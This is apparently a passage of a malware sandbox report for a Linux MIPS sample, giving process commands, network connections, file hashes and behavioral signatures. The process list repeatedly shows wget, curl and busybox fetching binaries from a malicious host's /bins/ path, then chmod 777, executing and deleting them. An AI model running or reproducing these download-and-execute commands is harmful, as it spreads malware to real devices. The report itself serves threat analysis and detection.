[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/rm
[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/chmod
[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/rm
[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/chmod
[chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
[./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/rm
[rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/chmod
[chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
[./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/rm
[rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/chmod
[chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
[./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/rm
[rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/chmod
[chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
[./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/rm
[rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/chmod
[chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
[./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/rm
[rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/chmod
[chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
[./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/rm
[rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/chmod
[chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
[./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/rm
[rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/chmod
[chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
[./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/rm
[rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/chmod
[chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
[./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/rm
[rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/chmod
[chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
[./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/rm
[rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/chmod
[chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
[./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/rm
[rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:30
Reported
2024-10-29 02:33
Platform
debian9-mipsel-20240226-en
Max time kernel
124s
Max time network
144s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | N/A |
| N/A | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | N/A |
| N/A | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | N/A |
| N/A | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | N/A |
| N/A | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | N/A |
| N/A | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | N/A |
| N/A | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | N/A |
| N/A | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | N/A |
| N/A | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | N/A |
| N/A | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | N/A |
| N/A | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | N/A |
| N/A | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | N/A |
| N/A | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | N/A |
| N/A | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | N/A |
| N/A | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | N/A |
| N/A | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | N/A |
| N/A | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /usr/bin/curl | N/A |
